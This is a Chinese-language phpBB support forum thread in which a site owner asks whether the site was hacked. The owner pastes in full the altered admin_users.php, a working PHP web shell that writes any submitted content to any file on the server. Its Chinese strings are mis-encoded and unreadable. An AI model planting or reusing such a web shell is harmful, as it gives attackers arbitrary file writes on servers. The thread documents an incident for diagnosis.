[問題]請問這是被駭了嗎?
版主: 版主管理群
版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
[問題]請問這是被駭了嗎?
●架設主機作業系統:Windows Xp Pro SP2 有開防火牆
●快速架站程式:Appserv
●您的上網方式:ADSL
●您的 phpBB2 版本:phpBB 2.0.6
●您的 domain(網域名稱) :www.gamejo.com
●您的 phpBB2 連結網址: http://www.gamejo.com
●錯誤狀態:
原本後台這個區域沒有東西的,這兩天沒進後台,今天一進去後台管理就出現這個欄位,]保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?
●快速架站程式:Appserv
●您的上網方式:ADSL
●您的 phpBB2 版本:phpBB 2.0.6
●您的 domain(網域名稱) :www.gamejo.com
●您的 phpBB2 連結網址: http://www.gamejo.com
●錯誤狀態:
原本後台這個區域沒有東西的,這兩天沒進後台,今天一進去後台管理就出現這個欄位,]保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?
找到一個他們改過的檔案admin_users.php
整個檔案被改成以下內容~
不過不知道什麼作用\r
有人可以幫忙看一下嗎?
整個檔案被改成以下內容~
不過不知道什麼作用\r
有人可以幫忙看一下嗎?
代碼: 選擇全部
<?php
// Codz by angel on 2004, May 26
// Powered by Security Angel Team
// 壺蛌砱趼睫\r
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
$_POST = stripslashes_array($_POST);
}
// 硒俴紱釬\r
if($_POST['action']=="create")
{
$fp=@fopen("".$_POST['filename']."","wb");
$content = $_POST['filedate'];
$fw=@fwrite($fp,$content);
if ($fw) {
echo "<b>鳩炰ㄛ迡恅璃傖髡ㄐ</b><a href=".$PHP_SELF.">殿隙</a>";
exit;
} else {
echo "<b>迡恅璃囮啖ㄛ岆祥岆癹腔恀枙ˋ</b><a href=".$PHP_SELF.">殿隙</a>";
}
@fclose($fp);
}
?>
<form action="<?=$PHP_SELF?>" method="post">
悵湔腔恅璃靡(:<font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename" size="60">
<p>
恅璃悵湔婓:<br>
<?=str_replace('\\\','/',dirname(__FILE__))?>
<p>
恅璃囀:<br>
<textarea name="filedate" cols="60" rows="10"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="悵湔">
</form>
<b>蛁砩ㄩ絞衄眈肮腔恅璃湔婓奀ㄛ蔚俇蜊迡囀ㄐ</b>
最後由 jhung 於 2004-12-13 13:57 編輯,總共編輯了 1 次。
-
- 星球公民
- 文章: 260
- 註冊時間: 2004-08-22 14:34
是有駭客作這檔事是為了提醒user注重安全性啦...
不過也不必這樣做吧......
不過也不必這樣做吧......
撿到一疊鈔票,原來是玩具鈔票,空歡喜一場。~~卡好勒
http://www.freepgs.com/hunej/phpBB2/
phpBB2 portal project+foxfireXD templates
http://www.freepgs.com/hunej/phpBB2/
phpBB2 portal project+foxfireXD templates